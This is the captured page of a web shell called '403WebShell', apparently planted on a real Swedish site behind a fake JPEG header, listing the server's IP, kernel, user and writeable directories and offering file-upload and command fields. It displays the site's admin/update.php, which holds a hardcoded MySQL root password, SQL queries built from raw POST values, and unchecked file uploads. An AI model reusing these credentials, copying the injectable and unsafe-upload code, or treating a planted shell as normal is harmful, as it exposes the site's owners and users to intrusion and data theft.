????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.144.156.43
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/www.biminfo.se/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www.biminfo.se/admin/update.php
<?php
session_start();
if($_GET['part'] == "info"){

	$link = mysql_connect ("localhost", "root", "root123");
	mysql_select_db ("biminfo");
	
	$id = $_SESSION['customerid'];
	$sql = "UPDATE tblCustomer SET info = '".$_POST['info']."' WHERE customerid = $id";
	$result = mysql_query($sql);

		header('location: http://www.biminfo.se/?page=inloggad');

}

if($_GET['part'] == "article"){

	$link = mysql_connect ("localhost", "root", "root123");
	mysql_select_db ("biminfo");
	
	$id = $_POST['id'];
	if($_POST['hide'] == "1"){
		$hide = 1;
	}else{
		$hide = 0;
	}
	
	
	$sql = "UPDATE tblContent SET model = '".$_POST['model']."', hide = ".$hide." WHERE id = $id";
	$result = mysql_query($sql);
	
	$linkid= $_POST['linkid'];
	$sql = "UPDATE tblLink SET url = '".$_POST['url']."' WHERE linkid = $linkid";
	$result = mysql_query($sql);

	header("location: http://www.biminfo.se/?page=inloggad#".$id."");

}

if($_GET['part'] == "content"){

	$link = mysql_connect ("localhost", "root", "root123");
	mysql_select_db ("biminfo");
	
	$id = $_POST['id'];
	if($_POST['hide'] == "1"){
		$hide = 1;
	}else{
		$hide = 0;
	}
	
	$size = $_POST['size'];
	$model= $_POST['model'];
	$color= $_POST['color'];
	$url= $_POST['url'];
	$type= $_POST['type'];
	$desc= $_POST['desc'];
	$keywords= $_POST['keywords'];
	
	if($_FILES['path']['name'] != ""){
		if($type == 1){
			$target_path_model = "/var/www/www.biminfo.se/data/models/";
		}else{
			$target_path_model = "/var/www/www.biminfo.se/data/extensions/";
		}
		
		$target_path_model = $target_path_model . basename( $_FILES['path']['name']); 
		move_uploaded_file($_FILES['path']['tmp_name'], $target_path_model);
		 $sql = "UPDATE tblContent SET thumb = 'data/models/".basename( $_FILES['path']['name'])."' WHERE id = $id";
	$result = mysql_query($sql);
	}
	
	if($_FILES['thumb']['name'] != ""){
		$target_path_thumb = "/var/www/www.biminfo.se/data/thumbs/";
		$target_path_thumb = $target_path_thumb . basename( $_FILES['thumb']['name']); 
		move_uploaded_file($_FILES['thumb']['tmp_name'], $target_path_thumb);
		 $sql = "UPDATE tblContent SET thumb = 'data/thumbs/".basename( $_FILES['thumb']['name'])."' WHERE id = $id";
	$result = mysql_query($sql);
	}
	
    $sql = "UPDATE tblContent SET model = '".$_POST['model']."', hide = ".$hide.", size = '".$_POST['size']."', color = '".$_POST['color']."', ctype = '".$_POST['type']."', keywords = '".$_POST['keywords']."', cdesc = '".$_POST['desc']."'  WHERE id = $id";
	$result = mysql_query($sql);
	
	$linkid= $_POST['linkid'];
	$sql = "UPDATE tblLink SET url = '".$_POST['url']."' WHERE linkid = $linkid";
	$result = mysql_query($sql);

	header("location: http://www.biminfo.se/?page=edit&id=".$id."");

}


?>

Youez - 2016 - github.com/yon3zu
LinuXploit